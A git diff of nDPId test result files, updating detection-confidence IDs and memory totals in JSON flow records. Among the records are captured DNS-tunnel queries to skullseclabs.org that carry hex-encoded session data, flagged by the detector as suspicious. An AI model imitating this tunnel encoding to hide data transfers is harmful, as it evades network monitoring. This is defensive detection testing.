-00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1486012635073,"flow_last_seen":1486012638093,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":364,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012638093,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"46b100fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":5,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1486012635073,"flow_last_seen":1486012639101,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":455,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012639101,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"c75900fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":16,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
-01080{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1486012635073,"flow_last_seen":1486012639174,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":577,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1486012639174,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"c75900fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":16,"rsp_type":16,"rsp_addr":"0.0.0.0"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":22,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1486012635073,"flow_last_seen":1486012637085,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":273,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012637085,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"e18f00fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":5,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00968{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":23,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1486012635073,"flow_last_seen":1486012638093,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":364,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012638093,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"46b100fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":5,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00969{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":24,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1486012635073,"flow_last_seen":1486012639101,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":455,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012639101,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"c75900fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":16,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +01080{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":25,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1486012635073,"flow_last_seen":1486012639174,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":122,"flow_tot_l4_payload_len":577,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1486012639174,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"c75900fdf525320021636f6d6d616e64202873697276696d65732900.skullseclabs.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":16,"rsp_type":16,"rsp_addr":"0.0.0.0"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":369,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012730177,"flow_last_seen":1486012730177,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012730177,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":46961,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":369,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1486012730177,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":133,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":133,"pkt_l4_len":99,"thread_ts_msec":1486012730177,"pkt":"AhoR+f4q5LMYS\/DDCABFAAB3Lk5AAEARGh\/AqCtbBAICBLdxADUAYz49\/HsBAAABAAAAAAAAOGEwNTcwMGU2ZGE4MzUxMDAwMTYzNmY2ZTczNmY2YzY1MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAA8AAQ=="} -00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012730177,"flow_last_seen":1486012730177,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012730177,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":46961,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a05700e6da83510001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00961{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":369,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1486012730177,"flow_last_seen":1486012730177,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":91,"flow_tot_l4_payload_len":91,"flow_avg_l4_payload_len":91,"midstream":0,"thread_ts_msec":1486012730177,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":46961,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a05700e6da83510001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":15,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00614{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":370,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1486012730381,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1486012730381,"pkt":"5LMYS\/DDAhoR+f4qCABFAACaAABAADMRVUoEAgIEwKgrWwA1t3EAhvb+\/HuBgAABAAEAAAAAOGEwNTcwMGU2ZGE4MzUxMDAwMTYzNmY2ZTczNmY2YzY1MjAyODczNjk3Mjc2Njk2ZDY1NzMyOTAwDHNrdWxsc2VjbGFicwNvcmcAAA8AAcAMAA8AAQAAADwAFwAKEmRlNjkwMGU2ZGE2ZWEyMDAwMMBF"} 
-01082{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":370,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1486012730177,"flow_last_seen":1486012730381,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1486012730381,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":46961,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"a05700e6da83510001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":15,"rsp_addr":"0.0.0.0"}} +01082{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":370,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1486012730177,"flow_last_seen":1486012730381,"flow_idle_time":200000,"flow_min_l4_payload_len":91,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":217,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1486012730381,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":46961,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"a05700e6da83510001636f6e736f6c65202873697276696d65732900.skullseclabs.org","num_queries":1,"num_answers":1,"reply_code":0,"query_type":15,"rsp_type":15,"rsp_addr":"0.0.0.0"}} 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":371,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1486012730381,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"thread_ts_msec":1486012730381,"pkt":"AhoR+f4q5LMYS\/DDCABFAABRLntAAEARGhjAqCtbBAICBLdxADUAPY6IeT8BAAABAAAAAAAAEmI1NDEwMWU2ZGE4MzUxNmVhMgxza3VsbHNlY2xhYnMDb3JnAAAPAAE="} -00924{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1486012730177,"flow_last_seen":1486012733669,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1486012733669,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":46961,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00926{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":349,"flow_first_seen":1486012635073,"flow_last_seen":1486012727540,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":80215,"flow_avg_l4_payload_len":229,"midstream":0,"thread_ts_msec":1486012733669,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00923{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1486012623234,"flow_last_seen":1486012630741,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":1620,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1486012733669,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00924{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1486012730177,"flow_last_seen":1486012733669,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":1495,"flow_avg_l4_payload_len":106,"midstream":0,"thread_ts_msec":1486012733669,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":46961,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00926{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":349,"flow_first_seen":1486012635073,"flow_last_seen":1486012727540,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":80215,"flow_avg_l4_payload_len":229,"midstream":0,"thread_ts_msec":1486012733669,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":56354,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00923{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":382,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":19,"flow_first_seen":1486012623234,"flow_last_seen":1486012630741,"flow_idle_time":200000,"flow_min_l4_payload_len":53,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":1620,"flow_avg_l4_payload_len":85,"midstream":0,"thread_ts_msec":1486012733669,"l3_proto":"ip4","src_ip":"192.168.43.91","dst_ip":"4.2.2.4","src_port":35966,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"16": {"risk":"Suspicious DGA Domain name","severity":"High","risk_score": {"total":250,"client":125,"server":125}},"27": {"risk":"Risky Domain Name","severity":"Medium","risk_score": {"total":760,"client":580,"server":180}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00568{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":382,"source":"bad-dns-traffic.pcap","alias":"nDPId-test","packets-captured":382,"packets-processed":382,"total-skipped-flows":0,"total-l4-payload-len":83330,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":8,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":29,"global_ts_msec":1486012733669} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 382/382 
@@ -35,9 +35,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5882965 bytes -~~ total memory freed........: 5882965 bytes -~~ total allocations/frees...: 118510/118510 +~~ total memory allocated....: 6016599 bytes +~~ total memory freed........: 6016599 bytes +~~ total allocations/frees...: 121272/121272 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 471 chars ~~ json string max len.......: 1087 chars diff --git a/test/results/badpackets.pcap.out b/test/results/badpackets.pcap.out index 88f15075f..c2259e72a 100644 --- a/test/results/badpackets.pcap.out +++ b/test/results/badpackets.pcap.out @@ -210,9 +210,9 @@ ~~ total active/idle flows...: 0/0 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5868383 bytes -~~ total memory freed........: 5868383 bytes -~~ total allocations/frees...: 118110/118110 +~~ total memory allocated....: 6002017 bytes +~~ total memory freed........: 6002017 bytes +~~ total allocations/frees...: 120872/120872 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 209 chars ~~ json string max len.......: 2303 chars diff --git a/test/results/bitcoin.pcap.out b/test/results/bitcoin.pcap.out index 9cfb4ec1b..37d0fa856 100644 --- a/test/results/bitcoin.pcap.out +++ b/test/results/bitcoin.pcap.out 
@@ -2,43 +2,43 @@ 00547{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-payload-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1301327937725} 00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301327937725,"flow_last_seen":1301327937725,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301327937725,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00615{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1301327937725,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301327937725,"pkt":"ACPrIpS0ACNshovhCABFAACdb3BAAEAGdmXAqAGOvKXVqdgVII1UFpaF9ORId4AY\/\/\/XwQAAAQEICicy22Mwkrss+b602XZlcnNpb24AAAAAAFUAAAABfQAAAQAAAAAAAABBsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/vKXVqSCNAQAAAAAAAAAAAAAAAAAAAAAA\/\/\/AqAGOII3ZMDrPGxAeDAD6vQEA"} 
-00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301327937725,"flow_last_seen":1301327937725,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301327937725,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} +00762{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1301327937725,"flow_last_seen":1301327937725,"flow_idle_time":7580000,"flow_min_l4_payload_len":105,"flow_max_l4_payload_len":105,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":105,"midstream":1,"thread_ts_msec":1301327937725,"l3_proto":"ip4","src_ip":"192.168.1.142","dst_ip":"188.165.213.169","src_port":55317,"dst_port":8333,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Mining","breed":"Unsafe","category":"Mining"}} 
00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1301327937800,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":171,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":171,"pkt_l4_len":137,"thread_ts_msec":1301327937800,"pkt":"ACNshovhACPrIpS0CABFAACd8zJAADQG\/qK8pdWpwKgBjiCN2BX05Eh3VBaWhYAYAC7fMwAAAQEICjCSu0gnMttj+b602XZlcnNpb24AAAAAAFUAAACcfAAAAQAAAAAAAABqsJBNAAAAAAEAAAAAAAAAAAAAAAAAAAAAAP\/\/JmCEHtgVAQAAAAAAAAAAAAAAAAAAAAAA\/\/+8pdWpII1MLcnArv8XlgAGwwEA"} 01828{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"bitcoin.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1301327937931,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1067,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1067,"pkt_l4_len":1033,"thread_ts_msec":1301327937931,"pkt":"ACPrIpS0ACNshovhCABFAAQdZEVAAEAGfhDAqAGOvKXVqdgVII1UFpbu9ORI4IAY\/\/\/JGQAAAQEICicy22UwkrtL+b602XZlcmFjawAAAAAAAAAAAAD5vrTZZ2V0YWRkcgAAAAAAAAAAAF324OL5vrTZZ2V0YmxvY2tzAAAApQMAAGlfIuqcfAAAHKh7ybVTxuZIQjrl7yTcgS++hNhBt1zq9NegAAAAAAAA0isW7TPLR9+QJv0A5WbZVCvm695mFYsw+RcAAAAAAAAKtKqLikjG018uz8LfLAtdjFIkeP\/i1erq1gAAAAAAAJBdQRxOhTejsSgFAkOe4jLdh+MgkNThEJ18AAAAAAAAuqLvaBfSt3u\/xIqIdA14a1vMRWgufw\/9NSQAAAAAAABmO+ZaHQMV8GVsd2tLL4rFQTc0+9Vfwkt\/KAAAAAAAAJT+LTuh4xfC31zGm\/GrV7uiO60OaIRMkzcNAAAAAAAAuhdRV0aXd6Zg2v\/d1GRW41CXeTNnyZ2lADQAAAAAAADN6C3MlB3uxd0izHdkP3dhS0au0yU7AWAQZwAAAAAAAL+B7POHga71M99A8Eu3CYdV7ruvTTFqTRaEAAAAAAAA3UsnAThWfVMwqZa+fYK\/+mnwaocTsbQIG1kAAAAAAADey3zxujtbDGk\/QTgO92YcU4PswnA6nOZ6FgAAAAAAAMDzxV+Dq1G5LChOJMi\/klliIw7dOCRLUwU1AAAAAAAAPos8A4n6clF7nKE4hFivm22s790lzTk\/xUsAAAAAAAC0sS5A1Mm4fwV3yc3Q1LndsofGdqv023cDhAAAAAAAAGvuGwU2Et\/fX33Zfbvd3fo\/8TaDBcaUcU3CAAAAAAAAP2JWK5H+eMf+Pv\/jSxNvOoqfqtxRlUdLIhEAAAAAAADJveYZh3372qwQQlL9GVXITa9jJ6DXXZhGDQAAAAAAAKMYV6DpTz6VcKhTn2GDUxJn1w6c\/O
